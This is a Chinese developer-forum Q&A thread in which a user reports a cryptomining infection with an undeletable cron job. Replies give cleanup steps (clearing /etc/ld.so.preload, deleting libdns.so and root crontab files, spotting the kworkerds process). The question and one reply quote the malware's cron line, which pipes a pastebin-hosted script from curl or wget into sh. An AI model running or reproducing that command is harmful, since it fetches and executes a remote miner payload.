开发者社区> 问答> 正文

服务器CPU100%,后台有个定时任务一直删除不掉;挖矿病毒;

后台有个定时任务一直删除不掉;如何处理,需要紧急回复!

[root@iz2ze46125tswrsd088ycrz bin]# crontab -l

*/23 * * * *    (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

##

展开
收起
1826905121899961 2018-09-17 15:14:41 4513 0
3 条回答
写回答
取消 提交回答
  • 喜欢智慧创造的过程
    服务器应该是通过网站漏洞上传了脚本木马并提权拿到了服务器权限执行了挖矿木马导致cpu百分之100,服务器一般都是网站存在漏洞,被黑客利用并提权入侵的,导致服务器中木马,网站被挂黑链,被篡改,被挂马。解决办法:检查可疑进程 关闭不用的端口,下载360杀毒进行全盘扫描,主要问题还是网站有漏洞导致被上传了木马后门,如果自己懂程序,那就可以自己针对代码的漏洞进行漏洞修复,不懂的话,就请专业的网站安全公司来完善一下程序上的某些代码漏洞,国内像SINE安全、绿盟安全、启明星辰都是比较专业的安全公司,很多黑客之所以能植入木马病毒,就是抓住了这些网站代码上的漏洞。
    2018-11-24 10:10:30
    赞同 1 展开评论 打赏
  • ###清除/etc/ld.so.preload的内容
        [root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
       ### 删除/usr/local/lib/lib/libdns.so文件
        [root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so
       ### 删除定时任务
        [root@SJ-pre-release ~]# cat /var/spool/cron/root
        */23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
        ##
        [root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
        [root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
        */31 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
        ##
        [root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root

    再次查看进程,发现有一个kworkerds,这个就是挖坑程序

    2018-10-19 11:25:29
    赞同 3 展开评论 打赏
  • 你好,你可以尝试下输入命令: crontab -e 编辑定时任务,然后看下是否删除。
    2018-09-17 16:24:49
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
服务器的第一道防线-美联集团堡垒的前世今生 立即下载
机器学习在大规模服务器治理复杂场景的实践 立即下载
函数计算事件驱动的无服务器计算服务 立即下载